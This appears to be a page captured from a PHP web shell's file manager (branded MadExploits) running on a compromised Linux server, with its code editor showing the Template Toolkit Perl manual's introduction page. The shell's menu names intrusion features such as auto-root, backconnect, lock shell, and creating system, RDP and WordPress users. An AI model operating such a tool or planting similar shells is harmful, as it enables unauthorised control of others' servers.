Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 52.14.223.136
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
perl-Template-Toolkit-2.24 /
manual /
[ HOME SHELL ]
Name
Size
Permission
Action
Config.html
138.03
KB
-rw-r--r--
Credits.html
14.14
KB
-rw-r--r--
Directives.html
129.52
KB
-rw-r--r--
Filters.html
40.71
KB
-rw-r--r--
Internals.html
37.98
KB
-rw-r--r--
Intro.html
22.93
KB
-rw-r--r--
Plugins.html
32.63
KB
-rw-r--r--
Syntax.html
21.75
KB
-rw-r--r--
VMethods.html
66.81
KB
-rw-r--r--
Variables.html
57.55
KB
-rw-r--r--
Views.html
41.31
KB
-rw-r--r--
index.html
16.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Intro.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Strict//EN"> <html> <head> <title>Template::Manual::Intro</title> <link rel="stylesheet" type="text/css" href="../css/blue.css" title="Clear Blue"> <link rel="alternate stylesheet" type="text/css" href="../css/orange.css" title="Clear Orange"> <link rel="alternate stylesheet" type="text/css" href="../css/green.css" title="Clear Green"> <link rel="alternate stylesheet" type="text/css" href="../css/purple.css" title="Clear Purple"> <link rel="alternate stylesheet" type="text/css" href="../css/grey.css" title="Clear Grey"> <link rel="alternate stylesheet" type="text/css" href="../css/print.css" title="Print"> <!--[if IE 6]> <link rel="stylesheet" type="text/css" href="../css/ie6.css" /> <![endif]--> <!--[if IE 7]> <link rel="stylesheet" type="text/css" href="../css/ie7.css" /> <![endif]--> <link rel="stylesheet" type="text/css" href="../css/print.css" media="print"> <script type="text/javascript" src="../js/tt2.js"></script> <meta http-equiv="Content-Type" content="text/html;charset=utf-8"> <meta name="author" content="Andy Wardley"> </head> <body id="body"> <div id="layout"> <div id="header"> <a href="../index.html" id="logo" alt="" title="Click for the Home Page"><span class="alt">TT2 Home Page</span></a> <ul id="trail"> <li><a href="../manual/index.html">Manual</a></li> <li class="last"><a href="../manual/Intro.html">Intro</a></li> </ul> <div class="controls"> <a href="#" class="menu show" onclick="widescreen_off(); return false" title="Show Menu"> <span class="about">Click to view the menu. It's very nice.</span> </a> <a href="#" class="menu hide" onclick="widescreen_on(); return false" title="Hide Menu"> <span class="about">Click to hide the menu and go all widescreen!</span> </a> <div class="pager"> <span class="go back">Back<span class="about">Yeah right, I bet you've love to go back, but you can't.</span></span> <a href="../manual/index.html" title="Template::Manual" class="go up">Up<span class="about"><h4>Template::Manual</h4>Template Toolkit User Manual</span></a> <a href="../manual/Syntax.html" title="Template::Manual::Syntax" class="go next">Next<span class="about"><h4>Template::Manual::Syntax</h4>Directive syntax, structure and semantics</span></a> </div> </div> <h1 class="headline">Template::Manual::Intro</h1> <h2 class="subhead">Introduction to the Template Toolkit</h1> </div> <div id="page"> <div id="sidebar"> <a href="../index.html" id="logo"></a> <div id="menu"> <ul class="menu"> <li class="l0 first"><a href="../manual/index.html" class="warm">Manual</a></li> <li class="l1"><a href="../manual/Intro.html" class="warm">Intro</a></li> <li class="l1"><a href="../manual/Syntax.html">Syntax</a></li> <li class="l1"><a href="../manual/Directives.html">Directives</a></li> <li class="l1"><a href="../manual/Variables.html">Variables</a></li> <li class="l1"><a href="../manual/VMethods.html">VMethods</a></li> <li class="l1"><a href="../manual/Config.html">Config</a></li> <li class="l1"><a href="../manual/Filters.html">Filters</a></li> <li class="l1"><a href="../manual/Plugins.html">Plugins</a></li> <li class="l1"><a href="../manual/Internals.html">Internals</a></li> <li class="l1"><a href="../manual/Views.html">Views</a></li> <li class="l1"><a href="../manual/Credits.html">Credits</a></li> <li class="l0"><a href="../modules/index.html">Modules</a></li> <li class="l0"><a href="../tools/index.html">Tools</a></li> <li class="l0"><a href="../tutorial/index.html">Tutorial</a></li> <li class="l0 last"><a href="../faq/index.html">FAQ</a></li> </ul> <div class="foot"></div> </div> </div> <div id="content"> <div class="section"> <div class="head"> <h1 id="contents" onclick="switch_section(this)" title="Click title to show/hide section content.">Contents</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <ul class="toc"> <li class=""><a href="#Introduction">Introduction</a></li> <li class=""><a href="#The_Template_Perl_Module">The Template Perl Module</a></li> <li class=""><a href="#Component_Based_Content_Construction">Component Based Content Construction</a></li> <li class=""><a href="#Data_and_Code_Binding">Data and Code Binding</a></li> <li class=""><a href="#Advanced_Features_Filters_Macros_Exceptions_Plugins">Advanced Features: Filters, Macros, Exceptions, Plugins</a></li> <li class=""><a href="#Separating_Presentation_and_Application_Logic">Separating Presentation and Application Logic</a></li> <li class=""><a href="#Performance">Performance</a></li> </ul> </div> </div> <div class="pod"> <div class="section"> <div class="head"> <h1 id="Introduction" onclick="switch_section(this)" title="Click title to show/hide section content.">Introduction</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> The Template Toolkit is a collection of Perl modules which implement a fast, flexible, powerful and extensible template processing system. It is most often used for generating dynamic web content, although it can be used equally well for processing any kind of text documents. </p> <p> At the simplest level it provides an easy way to process template files, filling in embedded variable references with their equivalent values. Here's an example of a template. </p> <pre>Dear <span class="tt">[% name %]</span>, It has come to our attention that your account is in arrears to the sum of <span class="tt">[% debt %]</span>. Please settle your account before <span class="tt">[% deadline %]</span> or we will be forced to revoke your Licence to Thrill. The Management.</pre> <p> By default, template directives are embedded within the character sequences <code>[%</code> ... <code>%]</code> but you can change these and various other options to configure how the Template Toolkit looks, feels and works. You can set the <code>INTERPOLATE</code> option, for example, if you prefer to embed your variables in Perl style: </p> <pre>Dear $name, It has come to our attention that your account is in arrears to the sum of $debt. ...etc...</pre> </div> </div> <div class="section"> <div class="head"> <h1 id="The_Template_Perl_Module" onclick="switch_section(this)" title="Click title to show/hide section content.">The Template Perl Module</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> The <a href="../modules/Template.html">Template</a> Perl module is the front end to the Template Toolkit for Perl programmers, providing access to the full range of functionality through a single module with a simple interface. It loads the other modules as required and instantiates a default set of objects to handle subsequent template processing requests. Configuration parameters may be passed to the <a href="../modules/Template.html">Template</a> constructor method, <a href="../modules/Template.html#method_new">new()</a>, which are then used to configure the generate object. </p> <pre>use Template; my $tt = Template->new({ INCLUDE_PATH => '/usr/local/templates', INTERPOLATE => 1, }) || die "$Template::ERROR\n";</pre> <p> The <a href="../modules/Template.html">Template</a> object implements a <a href="../modules/Template.html#method_process">process()</a> method for processing template files or text. The name of the input template (or various other sources) is passed as the first argument, followed by a reference to a hash array of variable definitions for substitution in the template. </p> <pre>my $vars = { name => 'Count Edward van Halen', debt => '3 riffs and a solo', deadline => 'the next chorus', }; $tt->process('letters/overdrawn', $vars) || die $tt->error(), "\n";</pre> <p> The <a href="../modules/Template.html#method_process">process()</a> method returns a true value (<code>1</code>) on success and prints the template output to <code>STDOUT</code>, by default. On error, the <a href="../modules/Template.html#method_process">process()</a> method returns a false value (<code>undef</code>). The <a href="../modules/Template.html#method_error">error()</a> method can then be called to retrieve details of the error. </p> </div> </div> <div class="section"> <div class="head"> <h1 id="Component_Based_Content_Construction" onclick="switch_section(this)" title="Click title to show/hide section content.">Component Based Content Construction</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> A number of special directives are provided, such as <code>INSERT</code>, <code>INCLUDE</code> and <code>PROCESS</code>, which allow content to be built up from smaller template components. This permits a modular approach to building a web site or other content repository, promoting reusability, cross-site consistency, ease of construction and subsequent maintenance. Common elements such as headers, footers, menu bars, tables, and so on, can be created as separate template files which can then be processed into other documents as required. All defined variables are inherited by these templates along with any additional "local" values specified. </p> <pre><span class="tt">[% PROCESS header title = "The Cat Sat on the Mat" %]</span> <span class="tt">[% PROCESS menu %]</span> The location of the missing feline has now been established. Thank you for your assistance. <span class="tt">[% INSERT legal/disclaimer %]</span> <span class="tt">[% PROCESS footer %]</span></pre> <p> You can also define a template as a BLOCK within the same file and PROCESS it just like any other template file. This can be invaluable for building up repetitive elements such as tables, menus, etc. </p> <pre><span class="tt">[% BLOCK tabrow %]</span> <tr><td><span class="tt">[% name %]</span></td><td><span class="tt">[% email %]</span></td></tr> <span class="tt">[% END %]</span> <table> <span class="tt">[% PROCESS tabrow name="tom" email="tom@here.org" %]</span> <span class="tt">[% PROCESS tabrow name="dick" email="disk@there.org" %]</span> <span class="tt">[% PROCESS tabrow name="larry" email="larry@where.org" %]</span> </table></pre> </div> </div> <div class="section"> <div class="head"> <h1 id="Data_and_Code_Binding" onclick="switch_section(this)" title="Click title to show/hide section content.">Data and Code Binding</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> One of the key features that sets the Template Toolkit apart from other template processors is the ability to bind template variables to any kind of Perl data: scalars, lists, hash arrays, sub-routines and objects. </p> <pre>my $vars = { root => 'http://here.com/there', menu => [ 'modules', 'authors', 'scripts' ], client => { name => 'Doctor Joseph von Satriani', id => 'JVSAT', }, checkout => sub { my $total = shift; ...; return $something }, shopcart => My::Cool::Shopping::Cart->new(), };</pre> <p> The Template Toolkit will automatically Do The Right Thing to access the data in an appropriate manner to return some value which can then be output. The dot operator '<code>.</code>' is used to access into lists and hashes or to call object methods. The <code>FOREACH</code> directive is provided for iterating through lists, and various logical tests are available using directives such as <code>IF</code>, <code>UNLESS</code>, <code>ELSIF</code>, <code>ELSE</code>, <code>SWITCH</code>, <code>CASE</code>, etc. </p> <pre><span class="tt">[% FOREACH section = menu %]</span> <a href="<span class="tt">[% root %]</span>/<span class="tt">[% section %]</span>/index.html"><span class="tt">[% section %]</span></a> <span class="tt">[% END %]</span> <b>Client</a>: <span class="tt">[% client.name %]</span> (id: <span class="tt">[% client.id %]</span>) <span class="tt">[% IF shopcart.nitems %]</span> Your shopping cart contains the following items: <ul> <span class="tt">[% FOREACH item = shopcart.contents %]</span> <li><span class="tt">[% item.name %]</span> : <span class="tt">[% item.qty %]</span> @ <span class="tt">[% item.price %]</span> <span class="tt">[% END %]</span> </ul> <span class="tt">[% checkout(shopcart.total) %]</span> <span class="tt">[% ELSE %]</span> No items currently in shopping cart. <span class="tt">[% END %]</span></pre> </div> </div> <div class="section"> <div class="head"> <h1 id="Advanced_Features_Filters_Macros_Exceptions_Plugins" onclick="switch_section(this)" title="Click title to show/hide section content.">Advanced Features: Filters, Macros, Exceptions, Plugins</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> The Template Toolkit also provides a number of additional directives for advanced processing and programmatical functionality. It supports output filters (FILTER), allows custom macros to be defined (MACRO), has a fully-featured exception handling system (TRY, THROW, CATCH, FINAL) and supports a plugin architecture (USE) which allows special plugin modules and even regular Perl modules to be loaded and used with the minimum of fuss. The Template Toolkit is "just" a template processor but you can trivially extend it to incorporate the functionality of any Perl module you can get your hands on. Thus, it is also a scalable and extensible template framework, ideally suited for managing the presentation layer for application servers, content management systems and other web applications. </p> </div> </div> <div class="section"> <div class="head"> <h1 id="Separating_Presentation_and_Application_Logic" onclick="switch_section(this)" title="Click title to show/hide section content.">Separating Presentation and Application Logic</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> Rather than embedding Perl code or some other scripting language directly into template documents, it encourages you to keep functional components (i.e. Perl code) separate from presentation components (e.g. HTML templates). The template variables provide the interface between the two layers, allowing data to be generated in code and then passed to a template component for displaying (pipeline model) or for sub-routine or object references to be bound to variables which can then be called from the template as and when required (callback model). </p> <p> The directives that the Template Toolkit provide implement their own mini programming language, but they're not really designed for serious, general purpose programming. Perl is a far more appropriate language for that. If you embed application logic (e.g. Perl or other scripting language fragments) in HTML templates then you risk losing the clear separation of concerns between functionality and presentation. It becomes harder to maintain the two elements in isolation and more difficult, if not impossible, to reuse code or presentation elements by themselves. It is far better to write your application code in separate Perl modules, libraries or scripts and then use templates to control how the resulting data is presented as output. Thus you should think of the Template Toolkit language as a set of layout directives for displaying data, not calculating it. </p> <p> Having said that, the Template Toolkit doesn't force you into one approach or the other. It attempts to be pragmatic rather than dogmatic in allowing you to do whatever best gets the job done. Thus, if you enable the EVAL_PERL option then you can happily embed real Perl code in your templates within PERL ... END directives. </p> </div> </div> <div class="section"> <div class="head"> <h1 id="Performance" onclick="switch_section(this)" title="Click title to show/hide section content.">Performance</h1> <a href="#body" class="top" title="Back up to the top of the page" >Top</a> </div> <div class="body"> <p> The Template Toolkit uses a fast YACC-like parser which compiles templates into Perl code for maximum runtime efficiency. It also has an advanced caching mechanism which manages in-memory and on-disk (i.e. persistent) versions of compiled templates. The modules that comprise the toolkit are highly configurable and the architecture around which they're built is designed to be extensible. The Template Toolkit provides a powerful framework around which content creation and delivery systems can be built while also providing a simple interface through the Template front-end module for general use. </p> </div> </div> </div></div> <br class="clear" /> <div class="pageinfo"> <a href="http://template-toolkit.org/docs/manual/Intro.html">http://template-toolkit.org/docs/manual/Intro.html</a> </div> </div> <div id="footer"> <a href="http://opensource.org/" class="osi"></a> <div class="controls"> <div class="pager"> <span class="go back">Back<span class="about"></span></span> <a href="../manual/index.html" title="Template::Manual" class="go up">Up<span class="about"><h4>Template::Manual</h4></span></a> <a href="../manual/Syntax.html" title="Template::Manual::Syntax" class="go next">Next<span class="about"><h4>Template::Manual::Syntax</h4></span></a> </div> </div> <div class="copyright"> Copyright © 1996-2012 <a href="http://wardley.org/">Andy Wardley</a>. All Rights Reserved. </div> <div class="licence"> The <a href="http://template-toolkit.org/">Template Toolkit</a> is <a href="http://opensource.org/">Open Source</a> software. You can redistribute and/or modify it under the terms of the <a href="http://www.opensource.org/licenses/gpl-license.php">GNU Public Licence</a> or the <a href="http://www.opensource.org/licenses/artistic-license.php">Perl Artistic Licence</a>. </div> </div> <div id="palette"> <ul> <li class="first"><a href="#" class="blue" onclick="set_style('Clear Blue')"></a></li> <li><a href="#" class="orange" onclick="set_style('Clear Orange')"></a></li> <li><a href="#" class="green" onclick="set_style('Clear Green')"></a></li> <li><a href="#" class="purple" onclick="set_style('Clear Purple')"></a></li> <li><a href="#" class="grey" onclick="set_style('Clear Grey')"></a></li> </ul> </div> </div> </body> </html>
Close